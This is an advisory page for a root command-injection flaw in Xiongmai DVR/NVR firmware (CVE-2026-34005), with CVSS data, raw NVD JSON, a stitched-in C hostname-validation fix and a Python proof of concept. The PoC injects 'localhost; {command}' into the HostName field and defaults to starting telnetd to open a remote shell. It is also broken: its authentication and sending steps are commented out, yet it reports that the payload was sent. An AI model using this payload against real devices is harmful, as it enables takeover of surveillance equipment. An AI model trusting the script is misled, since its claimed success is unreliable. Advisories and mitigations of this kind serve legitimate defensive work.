Security Vulnerability Report
CVE-2026-34005 CVSS 8.8 HIGH

Published: 2026-03-29 17:16:44
Last Modified: 2026-04-27 19:18:47

Description

In Sofia on Xiongmai DVR/NVR (AHB7008T-MH-V2 and NBD7024H-P) 4.03.R11 devices, root OS command injection can occur via shell metacharacters in the HostName value via an authenticated DVRIP protocol (TCP port 34567) request to the NetWork.NetCommon configuration handler, because system() is used.
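
The mitigation for this class of bug, as an added example (not code from this page, the advisory or the vendor firmware): validate the HostName value against an allow-list and set it with sethostname(2), so no shell ever parses it. The function names and the `hostname %s` command shown in the comment are assumptions; the page states only that system() is used.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE   /* exposes sethostname(2) on glibc */
#endif
#include <string.h>
#include <unistd.h>

#define NAME_MAX_LEN  64  /* Linux HOST_NAME_MAX, the sethostname(2) limit */
#define LABEL_MAX_LEN 63  /* RFC 1123 per-label limit */

/* Allow-list check: dot-separated labels of [A-Za-z0-9-], none empty, none
 * starting or ending with '-'. Returns 1 if valid, 0 otherwise. */
int is_valid_hostname(const char *name)
{
    size_t len, i, label_len = 0;

    if (name == NULL || (len = strlen(name)) == 0 || len > NAME_MAX_LEN)
        return 0;
    for (i = 0; i < len; i++) {
        char c = name[i];
        if (c == '.') {
            if (label_len == 0 || name[i - 1] == '-')
                return 0;           /* empty label, or label ending in '-' */
            label_len = 0;
        } else if (c == '-') {
            if (label_len++ == 0)
                return 0;           /* label starting with '-' */
        } else if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                   (c >= '0' && c <= '9')) {
            label_len++;
        } else {
            return 0;               /* ';' '|' '&' '$' '`' space, newline, ... */
        }
        if (label_len > LABEL_MAX_LEN)
            return 0;
    }
    return label_len > 0 && name[len - 1] != '-';
}

/* Assumed vulnerable pattern (the page names system() but shows no code):
 *     snprintf(cmd, sizeof cmd, "hostname %s", value); system(cmd);
 * Hardened form: validate, then use the syscall so no shell parses the value.
 * Returns 0 on success, -1 if the value is rejected or the syscall fails. */
int apply_hostname(const char *value)
{
    if (!is_valid_hostname(value))
        return -1;
    return sethostname(value, strlen(value));
}
```

Validation alone is a second line of defence; removing the shell from the code path is what closes CWE-78 here.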

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Xiongmai DVR/NVR Sofia 4.03.R11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-34005
# Requires socket and struct for DVRIP protocol framing (Conceptual)
import socket
import sys


def exploit(target_ip, target_port=34567, command="reboot"):
    # Note: Actual DVRIP protocol implementation requires binary framing.
    # This demonstrates the injection logic.

    # Malicious HostName payload with command injection
    # Using semicolon to chain commands in system()
    malicious_hostname = f"localhost; {command}"

    print(f"[*] Connecting to {target_ip}:{target_port}...")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))

        # Step 1: Authentication (Logic omitted, requires valid credentials)
        # auth_packet = build_dvrip_login(user, pass)
        # s.send(auth_packet)

        # Step 2: Send Exploit Packet to NetWork.NetCommon
        # Payload structure usually includes Operation ID, Session ID, and Data
        # Injecting into the HostName field within the configuration data
        payload_data = {
            "Handler": "NetWork.NetCommon",
            "Action": "SetConfig",
            "Parameter": "HostName",
            "Value": malicious_hostname
        }
        # exploit_packet = build_dvrip_packet(payload_data)
        # s.send(exploit_packet)

        print(f"[+] Payload sent: {malicious_hostname}")
        print("[!] Check if device executed the command (e.g., rebooted or shell opened)")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 poc.py <target_ip> [command]")
    else:
        # The optional command is the second argument, as the usage line states
        cmd = sys.argv[2] if len(sys.argv) > 2 else "telnetd -p 2323"
        exploit(sys.argv[1], 34567, cmd)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34005", "sourceIdentifier": "[email protected]", "published": "2026-03-29T17:16:44.257", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Sofia on Xiongmai DVR/NVR (AHB7008T-MH-V2 and NBD7024H-P) 4.03.R11 devices, root OS command injection can occur via shell metacharacters in the HostName value via an authenticated DVRIP protocol (TCP port 34567) request to the NetWork.NetCommon configuration handler, because system() is used."}, {"lang": "es", "value": "En dispositivos Xiongmai DVR/NVR (AHB7008T-MH-V2 y NBD7024H-P) 4.03.R11 de Sofia, puede ocurrir una inyección de comandos del sistema operativo como root a través de metacaracteres de shell en el valor HostName mediante una solicitud autenticada del protocolo DVRIP (protocolo TCP puerto 34567) al gestor de configuración NetWork.NetCommon, porque se utiliza system()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://uky007.github.io/CVE-2026-34005/", "source": "[email protected]"}, {"url": "https://www.xiongmaitech.com", "source": "[email protected]"}]}}